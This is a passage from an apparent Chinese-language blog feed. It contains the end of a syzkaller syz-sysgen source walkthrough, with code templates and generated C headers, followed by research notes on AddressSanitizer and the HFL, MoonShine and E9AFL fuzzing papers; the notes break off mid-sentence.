&#123;&#123;.PageSize&#125;&#125;</span></span><br><span class="line"><span class="string">#define SYZ_NUM_PAGES &#123;&#123;.NumPages&#125;&#125;</span></span><br><span class="line"><span class="string">#define SYZ_DATA_OFFSET &#123;&#123;.DataOffset&#125;&#125;</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">`</span>))</span><br></pre></td></tr></table></figure><p>代码模板看上去有点难以理解，因为其中混杂着 C 宏定义与模板描述，因此不妨从 <code>executor/defs.h</code> 中直接看看生成好的代码：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// AUTOGENERATED FILE</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">call_attrs_t</span> &#123;</span> </span><br><span class="line">    <span class="type">uint64_t</span> disabled;</span><br><span class="line">    <span class="type">uint64_t</span> timeout;</span><br><span class="line">    <span class="type">uint64_t</span> prog_timeout;</span><br><span class="line">    <span class="type">uint64_t</span> ignore_return;</span><br><span class="line">    <span class="type">uint64_t</span> breaks_returns;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">call_props_t</span> &#123;</span> </span><br><span class="line">    <span class="type">int</span> fail_nth;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> read_call_props_t(var, reader) &#123; \</span></span><br><span class="line"><span class="meta">    (var).fail_nth = (int)(reader); \</span></span><br><span class="line"><span class="meta">&#125;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOOS_akaros</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOOS <span class="string">&quot;akaros&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOARCH_amd64</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOARCH <span class="string">&quot;amd64&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_REVISION <span class="string">&quot;361c8bb8e04aa58189bcdd153dc08078d629c0b5&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_FORK_SERVER 1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_SHMEM 0</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_PAGE_SIZE 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_NUM_PAGES 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_DATA_OFFSET 536870912</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    ...</span><br><span class="line">        </span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOOS_linux</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOOS <span class="string">&quot;linux&quot;</span></span></span><br><span class="line">   ...</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOARCH_amd64</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOARCH <span class="string">&quot;amd64&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_REVISION <span class="string">&quot;e61403f96ca19fc071d8e9c946b2259a2804c68e&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_FORK_SERVER 1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_SHMEM 1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_PAGE_SIZE 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_NUM_PAGES 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_DATA_OFFSET 536870912</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    ...</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    ...</span><br><span class="line">        </span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOOS_windows</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOOS <span class="string">&quot;windows&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOARCH_amd64</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> GOARCH <span class="string">&quot;amd64&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_REVISION <span class="string">&quot;8967babc353ed00daaa6992068d3044bad9d29fa&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_FORK_SERVER 0</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_EXECUTOR_USES_SHMEM 0</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_PAGE_SIZE 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_NUM_PAGES 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SYZ_DATA_OFFSET 536870912</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>可以看到， syz-sysgen 会将把先前 <code>generateExecutorSyscalls</code> 函数中所生成的 ArchData 结构体数据，导出至 executor/defs.h 文件中，供后续编译 syz-executor 所使用。syz-sysgen 将所有OS所有架构所对应的 ArchData 数据全部导出至一个文件中，并使用宏定义来选择启用哪一部分的数据。</p><p>另一个代码模板 syscallsTempl 的内容如下：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// nolint: lll</span></span><br><span class="line"><span class="keyword">var</span> syscallsTempl = template.Must(template.New(<span class="string">&quot;&quot;</span>).Parse(<span class="string">`// AUTOGENERATED FILE</span></span><br><span class="line"><span class="string">// clang-format off</span></span><br><span class="line"><span class="string">&#123;&#123;range $os := $.OSes&#125;&#125;</span></span><br><span class="line"><span class="string">#if GOOS_&#123;&#123;$os.GOOS&#125;&#125;</span></span><br><span class="line"><span class="string">&#123;&#123;range $arch := $os.Archs&#125;&#125;</span></span><br><span class="line"><span class="string">#if GOARCH_&#123;&#123;$arch.GOARCH&#125;&#125;</span></span><br><span class="line"><span class="string">const call_t syscalls[] = &#123;</span></span><br><span class="line"><span class="string">&#123;&#123;range $c := $arch.Calls&#125;&#125;    &#123;&quot;&#123;&#123;$c.Name&#125;&#125;&quot;, &#123;&#123;$c.NR&#125;&#125;&#123;&#123;if or $c.Attrs $c.NeedCall&#125;&#125;, &#123; &#123;&#123;- range $attr := $c.Attrs&#125;&#125;&#123;&#123;$attr&#125;&#125;, &#123;&#123;end&#125;&#125;&#125;&#123;&#123;end&#125;&#125;&#123;&#123;if $c.NeedCall&#125;&#125;, (syscall_t)&#123;&#123;$c.CallName&#125;&#125;&#123;&#123;end&#125;&#125;&#125;,</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;&#125;;</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">`</span>))</span><br></pre></td></tr></table></figure><p>乍看上去还是有点难懂，我们不妨看看 <code>executor/syscalls.h</code> 示例：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOOS_linux</span></span><br><span class="line">...</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> GOARCH_amd64</span></span><br><span class="line"><span class="type">const</span> <span class="type">call_t</span> syscalls[] = &#123;</span><br><span class="line">    &#123;<span class="string">&quot;accept&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$alg&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$ax25&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$inet&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$inet6&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$netrom&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;accept$nfc_llcp&quot;</span>, <span class="number">43</span>&#125;,</span><br><span class="line">    ....,</span><br><span class="line">    &#123;<span class="string">&quot;bind&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$802154_dgram&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$802154_raw&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$alg&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$ax25&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$bt_hci&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;bind$bt_l2cap&quot;</span>, <span class="number">49</span>&#125;,</span><br><span class="line">    ....</span><br><span class="line">    &#123;<span class="string">&quot;prctl$PR_CAPBSET_DROP&quot;</span>, <span class="number">167</span>, &#123;<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, &#125;&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;prctl$PR_CAPBSET_READ&quot;</span>, <span class="number">167</span>, &#123;<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, &#125;&#125;,</span><br><span class="line">    &#123;<span class="string">&quot;prctl$PR_CAP_AMBIENT&quot;</span>, <span class="number">167</span>, &#123;<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, &#125;&#125;,</span><br><span class="line">    ....</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">...</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>可以看到，<code>executor/syscalls.h</code> 下会存放着各个 syzlang 中<strong>所声明的 syscall 名与 syscall调用号的映射关系</strong>，以及可能有的 <strong>SyscallData</strong>。同时，也是使用宏定义来控制使用<strong>哪个OS哪个Arch下的 syscalls 映射关系</strong>。</p><blockquote><p>再贴一下 SyscallData 结构体定义：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">type</span> SyscallData <span class="keyword">struct</span> &#123;</span><br><span class="line">    Name     <span class="type">string</span></span><br><span class="line">    CallName <span class="type">string</span></span><br><span class="line">    NR       <span class="type">int32</span></span><br><span class="line">    NeedCall <span class="type">bool</span></span><br><span class="line">    Attrs    []<span class="type">uint64</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></blockquote><h3 id="5-小结">5. 小结</h3><p>当执行完 syz-extractor 为每个 syslang 文件生成一个常量映射表 <code>.const</code> 文件后，syz-sysgen 便会利用常量映射表，来彻底的解析 syzlang 源码，获取到其中声明的类型信息与 syscall 参数依赖关系。</p><p>当这些信息全都收集完毕后，syz-sysgen 便会将这些数据全部序列化为 go 文件，以供后续 syz-fuzzer 所使用。除此之外，syz-sysgen 还会创建 executor/defs.h 和 executor/syscalls.h，将部分信息导出至 C 头文件，以供后续 syz-executor 编译使用。</p><p>简单地说，syz-sysgen 解析 syzlang 文件，并为 syz-fuzzer 和 syz-executor 的编译运行做准备。</p><p>调试用的 vscode launch.json 文件：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;version&quot;</span><span class="punctuation">:</span> <span class="string">&quot;0.2.0&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;configurations&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;syzgenLaunch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;go&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;request&quot;</span><span class="punctuation">:</span> <span class="string">&quot;launch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;mode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;auto&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;program&quot;</span><span class="punctuation">:</span> <span class="string">&quot;$&#123;fileDirname&#125;&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;env&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;cwd&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/syzkaller&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;args&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">&quot;-src&quot;</span><span class="punctuation">,</span> <span class="string">&quot;/usr/class/syzkaller&quot;</span><span class="punctuation">,</span> <span class="string">&quot;-out&quot;</span><span class="punctuation">,</span> <span class="string">&quot;/tmp&quot;</span><span class="punctuation">]</span> </span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/google/syzkaller&quot;&gt;syzkaller&lt;/a&gt; 是 google 开源的一款无监督覆盖率引导的 kernel fuzzer，支持包括 Linux、Windows 等操作系统的测试。&lt;/p&gt;
&lt;p&gt;syzkaller 有很多个部件。其中：&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;syz-extract：用于解析 syzlang 中的常量&lt;/li&gt;
&lt;li&gt;syz-sysgen：用于解析 syzlang，提取其中描述的 syscall 和参数类型，以及参数依赖关系&lt;/li&gt;
&lt;li&gt;syz-manager：用于启动与管理 syzkaller&lt;/li&gt;
&lt;li&gt;syz-fuzzer：实际在 VM 中运行的 fuzzer&lt;/li&gt;
&lt;li&gt;syz-executor：实际在 VM 中运行的测试程序&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;架构图如下：&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/2022/03/syzkaller-1/process_structure.png&quot; alt=&quot;syzkaller 的进程结构&quot;&gt;&lt;/p&gt;
&lt;p&gt;在本文中，我将先介绍 &lt;strong&gt;syz-extract 和 syz-sysgen&lt;/strong&gt; 的源码。&lt;/p&gt;</summary>
    
    
    
    
    <category term="syzkaller" scheme="https://kiprey.github.io/tags/syzkaller/"/>
    
  </entry>
  
  <entry>
    <title>论文笔记随笔 - 1</title>
    <link href="https://kiprey.github.io/2022/03/other_paper_notes/"/>
    <id>https://kiprey.github.io/2022/03/other_paper_notes/</id>
    <published>2022-03-06T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.061Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><p>这里存放阅读论文/读代码时所记录下的一些<strong>零碎</strong>笔记。</p><p>由于这部分活动在记录笔记时，出于时间与重要性考虑，只会记录下较为重要的一部分，不会完整记录，因此单篇笔记的篇幅不会太长。</p><blockquote><p>原先是想着把这些随笔放到周报里去，但是这会打乱周报的排版，思来想去还是想单独立一篇文章出来。</p></blockquote><span id="more"></span><h2 id="一、Address-Sanitizer-LLVM-3-1">一、Address Sanitizer LLVM 3.1</h2><p>阅读 Address Sanitizer LLVM 3.1 最早期的源代码。</p><ul><li><p>Asan 使用 8 字节映射至 1字节的粗粒度内存映射。每块虚拟内存都会对应一块 shadow memory。</p><blockquote><p>8字节的粗粒度，是因为 malloc 返回地址会对齐8字节。</p></blockquote><p>其中 shadow byte 上的值表示 origin memory 中前 n 个字节是可访问的。</p></li><li><p>Asan 会在 LLVM pass 过程的末尾，对所有的内存读写操作进行插桩，检查当前访问的内存地址所对应的 shadow byte 的值是否说明当前地址可访问。如果不可访问则直接abort。</p></li><li><p>对于溢出检测，asan 会在用户内存的<strong>左右</strong>两边分别加上一块大小固定的 redzone，其中 redzone 所对应的 shadow memory 将会被加毒。这样当访问到 redzone 时将触发 asan。</p><blockquote><p>加毒（poison) 指的是将某块用户内存所对应的 shadow memory 标记为不可访问。</p></blockquote></li><li><p>对于栈内存来说，它会先分配一块 <strong>原始栈大小 + (等待被 redzone 检测的变量个数 + 1) * redzone 大小</strong>的内存，然后修改那些目标变量的 alloc 指令的偏移量。（poisonStackInFunction 函数）</p><p>之后，将一些栈上的信息放入当前栈帧最左边的 redzone里。</p><p>在函数头部，插入给当前栈帧 redzone 加毒的操作；并在所有 ret 语句之前插入 redzone 解毒的操作。</p><p>对于当前函数，若当前函数执行了一些 noret 的函数（例如 exit、execve），则在执行这些 noret 函数之前，必须对其解毒，防止误报。处理 no ret call 是为了防止有不返回的函数调用导致调用后栈上的 poison 信息没有被处理。</p></li><li><p>但需要注意的是，asan 只会在<strong>全局变量</strong>的<strong>右边</strong>加 redzone。 （insertGlobalRedzones 函数）</p><p>同时，虽然全局变量的 redzone 的添加操作是以插桩的形式加入程序中，但全局变量的加毒解毒操作是位于 runtime 中。</p></li><li><p>Asan 会 hook memcpy 等内存处理或字符串处理的 lib 函数，以达到更好的效果。（InitializeAsanInterceptors 函数）</p></li><li><p>asan 除了检测 内存越界读写以外，它同样检测 UAF 和 use after return。</p><ul><li><p>UAF</p><p>asan hook 掉了 malloc、free、realloc 等函数，创建了自己的内存管理机制，在分配内存时对内存解毒，在释放内存时加毒。</p><p>对于动态分配的内存，一共有三种主要状态，分别是：可分配、检疫、已分配。当某个内存块被释放时，该内存块将会被设置为<strong>检疫</strong>状态，并放置到检疫队列中。等到检疫队列数量超过阈值后，再将其中的检疫内存放回可分配内存池中。这样做的目的是为了<strong>延长某块内存从被释放到被二次分配的过程</strong>，延长检测 UAF 的窗口期。</p></li><li><p>use after return</p><p>在替换栈帧上原始 alloc 为新 alloc 之前，asan 会先分配一块 fake stack, 然后在替换 alloc 指令时，将其地址替换为 fake stack。这样，带有 redzone 的局部变量就会 alloc 在 fake stack 上，而不是 origin stack。</p><p>在当前函数结束时，fake stack 会被重新加毒，注意此时<strong>不会回收</strong> fake stack。</p><p>那么 fake stack 在什么时候被回收呢？在分配 fake stack时。分配时会同步检测 fake stack 的调用栈，遍历调用栈中的每个 fake stack，判断当前 fake stack 所对应的 real_stack 地址是否大于当前的运行时栈。如果大于则说明该 fake stack 已经没有用处了，因此将会被释放。</p></li></ul></li><li><p>asan 第一版存在局限性，例如不会检测到<strong>结构体成员之间内存对齐的那一小部分内存</strong>的越界，以及不会检测这种越界到<strong>另一块用户可读写内存</strong>中的情况等等，不过总体上实现效果非常优秀。</p></li></ul><blockquote><p>这里感谢 sad 师傅分享的笔记。</p></blockquote><h2 id="二、HFL-Hybrid-Fuzzing-on-the-Linux-Kernel">二、HFL: Hybrid Fuzzing on the Linux Kernel</h2><p>论文 <code>HFL: Hybrid Fuzzing on the Linux Kernel</code> 结合 fuzz 技术和符号执行技术，主要解决三个问题：</p><ul><li><p>由 syscall 参数所决定的间接控制流改变，会使得符号执行效率低下。（主要是这种：</p><p><img src="/2022/03/other_paper_notes/image-20220227202648534.png" alt="image-20220227202648534"></p><ul><li>random fuzz 无法高效处理那些<strong>函数指针表索引来自参数</strong>的情况。</li><li>符号执行技术用一个 symbol 来索引函数表可能会导致符号解引用，而且还需要符号探索整个值空间</li></ul><p><strong>解决方案</strong>：基于 kernel src 做了一个<strong>离线</strong>转换器，用于在<strong>编译时</strong>将间接控制流转换成直接控制流：</p><p><img src="/2022/03/other_paper_notes/image-20220227202903484.png" alt="image-20220227202903484"></p></li><li><p>需要推断 syscall 调用序列和依赖关系，以便于控制和匹配内部系统状态，防止 fuzz 效率低效</p><p>解决方法：</p><ol><li><p>首先使用静态分析技术（占大头的应该是指针分析技术），在多个 syscall 中收集<strong>对相同内存位置进行读写</strong>的<strong>内存读写对</strong> 集合（candidates）。这种内存读写是分开的，即在一个 syscall 中 write，在另一个 syscall 中 read。</p></li><li><p>之后在 runtime 中验证这些 candidates。因为静态分析会产生一些误报，因此需要在执行时检测某个内存读写对是否确实会访问相同的内存位置，如果是则说明遍历到的 candidate 是真正的依赖关系对。</p><p>同时写操作的 syscall 一定在读操作的前面，因为<strong>只有先写才能读</strong>。</p></li><li><p>使用符号执行技术，确定 syscall 参数之间的依赖关系。例如 syscall2 中的参数等于 syscall1 中的某个参数，具体的看下面工作流程图可得知。</p></li></ol><p>工作流程如下：</p><p><img src="/2022/03/other_paper_notes/image-20220227203857407.png" alt="image-20220227203857407"></p></li><li><p>推断用于调用 syscall 的嵌套参数类型。这里还是用的老一套方法，检测 copy_from_user 函数以检测 syscall 嵌套参数的情况。这个其实不用多说，一张图胜过千言万语。</p><p><img src="/2022/03/other_paper_notes/image-20220227204307290.png" alt="image-20220227204307290"></p></li></ul><p>除了上面这三个问题以外，hybrid fuzz 中 fuzz 和 symbolic excution 切换的时机也很关键，其 fuzzer 内部<strong>维持了一个频率表，用于统计每个分支的 true/false 评估数量</strong>。我个人对这个设计还挺感兴趣，但是源码存放的网站已经被关闭，找不到源码了。</p><h2 id="三、MoonShine-Optimizing-OS-Fuzzer-Seed">三、MoonShine: Optimizing OS Fuzzer Seed</h2><p>论文 <code>MoonShine: Optimizing OS Fuzzer Seed</code>。这篇论文主要说明如何从真实系统调用序列中提取 OS Fuzzer 种子（种子蒸馏），同时保留依赖关系。它给出了两个有意思的依赖关系定义：对于 syscall $C_i、C_j$ 来说，</p><ul><li><p>显式依赖：若 $C_i$ 生成的值用做 $C_j$ 的参数输入时，则说明 $C_j$ 依赖 $C_i$ ，那么自然得先调用 $C_i$ 再调用 $C_j$。</p><p><img src="/2022/03/other_paper_notes/image-20220227211315342.png" alt="image-20220227211315342"></p></li><li><p>隐式依赖：若 $C_i$ 在执行过程中会<strong>通过共享变量读写</strong>来影响 $C_j$ 的执行，则说明 $C_j$ 依赖 $C_i$ 的执行。</p><p><img src="/2022/03/other_paper_notes/image-20220227211330243.png" alt="image-20220227211330243"></p></li></ul><p>MoonShine 建立依赖关系的流程是这样的：</p><ul><li><p>对于<strong>显式依赖</strong>来说，MoonShine 主要构建依赖关系图，通过调用序列，将 syscall 返回值和对应的 syscall 参数相连接，来确定显式依赖。</p></li><li><p>对于<strong>隐式依赖</strong>来说，MoonShine 主要通过分析一对 syscall 之中的读写依赖项来确定依赖关系。即，若 $C_i$ 读取的全局变量集合与 $C_j$ 写入的全局变量集合之间存在交集，则说明这两个 syscall 之间存在隐式依赖关系。但需要注意的是，受限于静态分析的精度，其隐式依赖关系可能会被高估或者低估。</p></li></ul><blockquote><p>需要注意的是</p><ol><li>如果 $C_i$ <strong>隐式</strong>依赖与 $C_j$，而 $C_j$ <strong>显式</strong>依赖于 $C_k$，则可说明 $C_i$ <strong>隐式</strong>依赖于 $C_k$</li><li>如果 $C_i$ <strong>显式</strong>依赖与 $C_j$，而 $C_j$ <strong>隐式</strong>依赖于 $C_k$，则可说明 $C_i$ <strong>显式</strong>依赖于 $C_k$</li></ol></blockquote><p>算法伪代码如下所示，伪代码还是比较好理解的：</p><p><img src="/2022/03/other_paper_notes/image-20220227213931466.png" alt="image-20220227213931466"></p><p>以下是整体的算法思路：</p><ul><li>首先是根据 coverage 对 syscall 进行排序，优先处理 coverage 更高的 syscall。</li><li>之后遍历 syscall 序列，获取其隐式依赖和显式依赖，并将其添加进语料序列中。</li></ul><p><img src="/2022/03/other_paper_notes/image-20220227213945270.png" alt="image-20220227213945270"></p><h2 id="四、Scalable-Fuzzing-of-Program-Binaries-with-E9AFL">四、Scalable Fuzzing of Program Binaries with E9AFL</h2><p>阅读论文 <code>Scalable Fuzzing of Program Binaries with E9AFL</code>：</p><p>e9afl 是一个可对无符号二进制程序插桩实现覆盖率反馈的工具，插桩后的程序可以直接用于 AFL 中进行 fuzz。相对于其他针对纯二进制文件进行 fuzz 的方法，它的优势在于插桩后的 overhead 还能保证在较低水平，同时还保证较高的精度。</p><p>整个插桩过程主要分为三步：</p><ol><li><p>设计待插入的 trampoline template。这个没啥好说的，基本和 AFL 插桩方式对齐：</p><p><img src="/2022/03/other_paper_notes/image-20220302154604172.png" alt="image-20220302154604172"></p></li><li><p>运行时插入。这步主要做的是将 fork server 和共享内存初始化等操作注入进 binary 中，使得在执行 main 函数前就执行这些操作。</p></li><li><p>确定待插桩的指令位置集合。e9afl 自己实现了一个轻量级控制流分析，以查找所有可能的 jump targets，其中包括直接目标和间接目标。间接目标的检测是通过<strong>分析数据段上的跳转表和指向代码的指针</strong>所确定的。</p><p>有意思的是，虽然静态控制流分析可能会存在一些精度误差（jump targets 多分析或者少分析），但是这些误差对整个 fuzz 过程不会造成太大的影响。</p></li></ol><p>需要注意的是，如果 e9afl 只是插桩 trampoline 但不对其进行任何优化的话，整个程序的执行速度将会非常的慢。虽然 forkserver 对二进制程序的启动速度进行优化，但 fork 出的子进程将会<strong>大量触发页错</strong>。这是因为这些子进程会经常执行到 trampoline，因此会触发到 trampoline 所在页的页错误。</p><p>页错误是制约 e9afl 性能影响的关键，因此需要对其进行优化。这里它提出了三种优化策略：</p><ol><li><p>trampoline ordering</p><p>使用与 patch 指令所对应的顺序，来在内存上分配 trampoline 内存。</p><p>什么意思呢？个人认为是这样的，对于相同代码区域（假设<strong>函数</strong>级的代码区域），e9afl 尽可能地<strong>将这个函数中所会用到的 trampoline，全部集中分配到某个页面（或者某个集中内存页区域里）</strong>。换句话说，尽可能让 patch 点相邻的指令，其 trampoline 也相邻。</p><p>这背后的原理是：对于一个函数来说，这个函数中的 trampoline 大概率是会<strong>大半都被执行</strong>的，那么如果将这个函数中的 trampoline 全都集中到一起，当函数执行第一个 trampoline1 